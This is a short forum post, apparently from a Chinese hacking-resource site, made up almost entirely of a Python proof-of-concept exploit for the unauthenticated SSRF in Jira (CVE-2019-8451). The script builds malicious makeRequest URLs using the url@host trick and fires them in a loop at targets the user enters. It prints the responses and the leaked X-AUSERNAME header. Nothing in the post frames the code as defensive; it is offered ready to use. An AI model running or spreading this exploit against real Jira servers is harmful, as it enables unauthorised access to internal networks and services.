Jira 未授权SSRF(CVE-2019-8451)

POC Jira 未授权SSRF(CVE-2019-8451)

Shacker已验证会员

黑客倉庫站長

贡献: 21%
Python:
import requests
import sys
# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:[email protected]/

def ssrf_poc(url, ssrf_url):
    if url[-1] == '/':
        url = url[:-1]
    else:
        url = url

    vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url

    headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "X-Atlassian-Token": "no-check",
    "Connection": "close"
    }

    r = requests.get(url=vuln_url, headers=headers)
    if r.status_code == 200 and 'set-cookie' in r.content:
        print ("\n>>>>Send poc Success!\n")
        print ('X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME'))
        print ("\n>>>>vuln_url= " + vuln_url + '\n')
        print (r.content)
    else:
        print ("No Vuln Exit!")


if __name__ == "__main__":
    
    while True:
        print
        ssrf_url = raw_input(">>>>SSRF URL: ")
        url = sys.argv[1]
        ssrf_poc(url, ssrf_url)
 
后退
顶部